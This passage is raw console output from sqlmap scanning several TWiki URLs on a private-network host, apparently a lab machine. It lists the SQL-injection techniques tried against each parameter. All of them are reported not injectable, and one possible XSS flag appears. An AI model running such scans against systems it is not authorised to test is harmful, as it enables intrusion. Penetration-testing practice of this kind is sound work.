[18:34:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:34:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:34:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:34:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:34:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:34:22] [INFO] testing 'Oracle AND time-based blind' | |
[18:34:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:34:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:34:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:35:08] [WARNING] GET parameter 'scope' is not injectable | |
[18:35:08] [INFO] testing if GET parameter 'regex' is dynamic | |
[18:35:08] [WARNING] GET parameter 'regex' does not appear dynamic | |
[18:35:08] [WARNING] heuristic (basic) test shows that GET parameter 'regex' might not be injectable | |
[18:35:08] [INFO] testing for SQL injection on GET parameter 'regex' | |
[18:35:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:35:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:35:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:35:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:35:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:35:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:35:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:35:14] [INFO] testing 'MySQL inline queries' | |
[18:35:14] [INFO] testing 'PostgreSQL inline queries' | |
[18:35:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:35:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:35:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:35:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:35:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:35:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:35:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:35:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:35:19] [INFO] testing 'Oracle AND time-based blind' | |
[18:35:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:35:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:35:38] [WARNING] GET parameter 'regex' is not injectable | |
[18:35:38] [INFO] testing if GET parameter 'search' is dynamic | |
[18:35:38] [INFO] confirming that GET parameter 'search' is dynamic | |
[18:35:38] [WARNING] GET parameter 'search' does not appear dynamic | |
[18:35:38] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable | |
[18:35:38] [INFO] testing for SQL injection on GET parameter 'search' | |
[18:35:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:35:38] [WARNING] reflective value(s) found and filtering out | |
[18:35:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:35:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:35:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:35:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:35:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:35:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:35:42] [INFO] testing 'MySQL inline queries' | |
[18:35:42] [INFO] testing 'PostgreSQL inline queries' | |
[18:35:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:35:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:35:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:35:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:35:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:35:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:35:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:35:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:35:47] [INFO] testing 'Oracle AND time-based blind' | |
[18:35:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:35:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:35:59] [WARNING] GET parameter 'search' is not injectable | |
[18:35:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^b' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^c' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^d' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^e' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^f' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^g' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^h' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^i' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^j' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^k' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^l' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^m' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^n' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^o' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^p' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^q' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^r' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^s' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^t' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^u' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^v' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^w' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^x' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^y' | |
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&search=^z' | |
URL 32: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&bookview=on&search=\.* | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:35:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic®ex=on&bookview=on&search=\.*' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:35:59] [INFO] testing connection to the target URL | |
[18:36:13] [INFO] testing if the target URL is stable | |
[18:36:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:36:20] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:36:21] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:36:21] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:36:21] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:36:21] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:36:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:36:21] [WARNING] reflective value(s) found and filtering out | |
[18:36:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:36:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:36:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:36:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:36:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:36:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:36:29] [INFO] testing 'MySQL inline queries' | |
[18:36:29] [INFO] testing 'PostgreSQL inline queries' | |
[18:36:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:36:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:36:36] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) | |
[18:36:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:36:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:36:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:36:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:36:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:36:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:36:39] [INFO] testing 'Oracle AND time-based blind' | |
[18:36:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:36:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:37:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:37:27] [WARNING] URI parameter '#1*' is not injectable | |
[18:37:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 33: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebSearch?t=1441456678 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:37:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebSearch?t=1441456678' | |
[18:37:28] [INFO] testing connection to the target URL | |
[18:37:28] [INFO] testing if the target URL is stable | |
[18:37:29] [INFO] target URL is stable | |
[18:37:29] [INFO] testing if GET parameter 't' is dynamic | |
[18:37:29] [WARNING] GET parameter 't' does not appear dynamic | |
[18:37:29] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:37:29] [INFO] testing for SQL injection on GET parameter 't' | |
[18:37:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:37:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:37:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:37:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:37:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:37:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:37:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:37:33] [INFO] testing 'MySQL inline queries' | |
[18:37:33] [INFO] testing 'PostgreSQL inline queries' | |
[18:37:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:37:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:37:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:37:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:37:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:37:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:37:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:37:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:37:37] [INFO] testing 'Oracle AND time-based blind' | |
[18:37:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:37:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:37:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:37:51] [WARNING] GET parameter 't' is not injectable | |
[18:37:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 34: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:37:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:37:51] [INFO] testing connection to the target URL | |
[18:37:51] [INFO] testing if the target URL is stable | |
[18:37:52] [INFO] target URL is stable | |
[18:37:52] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:37:52] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:37:52] [INFO] URI parameter '#1*' is dynamic | |
[18:37:52] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:37:52] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:37:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:37:52] [WARNING] reflective value(s) found and filtering out | |
[18:37:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:37:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:37:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:37:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:37:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:37:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:37:56] [INFO] testing 'MySQL inline queries' | |
[18:37:56] [INFO] testing 'PostgreSQL inline queries' | |
[18:37:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:37:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:37:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:37:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:37:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:37:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:37:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:38:00] [INFO] testing 'Oracle AND time-based blind' | |
[18:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:38:01] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:38:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:38:12] [WARNING] URI parameter '#1*' is not injectable | |
[18:38:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 35: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:38:12] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?skin=print' | |
[18:38:12] [INFO] testing connection to the target URL | |
[18:38:12] [INFO] testing if the target URL is stable | |
[18:38:13] [INFO] target URL is stable | |
[18:38:13] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:38:13] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:38:13] [INFO] GET parameter 'skin' is dynamic | |
[18:38:13] [INFO] heuristics detected web page charset 'ascii' | |
[18:38:13] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:38:13] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:38:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:38:13] [WARNING] reflective value(s) found and filtering out | |
[18:38:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:38:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:38:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:38:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:38:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:38:17] [INFO] testing 'MySQL inline queries' | |
[18:38:17] [INFO] testing 'PostgreSQL inline queries' | |
[18:38:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:38:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:38:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:38:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:38:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:38:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:38:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:38:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:38:21] [INFO] testing 'Oracle AND time-based blind' | |
[18:38:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:38:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:38:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:38:34] [WARNING] GET parameter 'skin' is not injectable | |
[18:38:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 36: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.13&rev2=1.12 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:38:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.13&rev2=1.12' | |
[18:38:34] [INFO] testing connection to the target URL | |
[18:38:34] [INFO] testing if the target URL is stable | |
[18:38:35] [INFO] target URL is stable | |
[18:38:35] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:38:35] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:38:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:38:35] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:38:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:38:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:38:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:38:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:38:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:38:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:38:39] [INFO] testing 'MySQL inline queries' | |
[18:38:39] [INFO] testing 'PostgreSQL inline queries' | |
[18:38:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:38:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:38:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:38:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:38:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:38:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:38:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:38:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:38:42] [INFO] testing 'Oracle AND time-based blind' | |
[18:38:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:38:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:38:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:38:54] [WARNING] GET parameter 'rev1' is not injectable | |
[18:38:54] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:38:54] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:38:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:38:54] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:38:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:38:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:38:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:38:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:38:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:38:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:38:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:38:59] [INFO] testing 'MySQL inline queries' | |
[18:38:59] [INFO] testing 'PostgreSQL inline queries' | |
[18:38:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:39:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:39:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:39:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:39:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:39:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:39:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:39:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:39:03] [INFO] testing 'Oracle AND time-based blind' | |
[18:39:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:39:15] [WARNING] GET parameter 'rev2' is not injectable | |
[18:39:15] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 37: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.12 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:39:15] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.12' | |
[18:39:15] [INFO] testing connection to the target URL | |
[18:39:16] [INFO] testing if the target URL is stable | |
[18:39:17] [INFO] target URL is stable | |
[18:39:17] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:39:17] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:39:17] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:39:17] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:39:17] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:39:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:39:17] [WARNING] reflective value(s) found and filtering out | |
[18:39:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:39:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:39:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:39:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:39:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:39:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:39:21] [INFO] testing 'MySQL inline queries' | |
[18:39:21] [INFO] testing 'PostgreSQL inline queries' | |
[18:39:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:39:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:39:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:39:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:39:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:39:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:39:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:39:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:39:24] [INFO] testing 'Oracle AND time-based blind' | |
[18:39:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:39:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:39:38] [WARNING] GET parameter 'rev' is not injectable | |
[18:39:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:39:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebSearch?rev1=1.12&rev2=1.11' | |
[18:39:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebSearch?rev=1.11' | |
URL 38: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebSearch?template=oopsmore¶m1=1.13¶m2=1.13 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
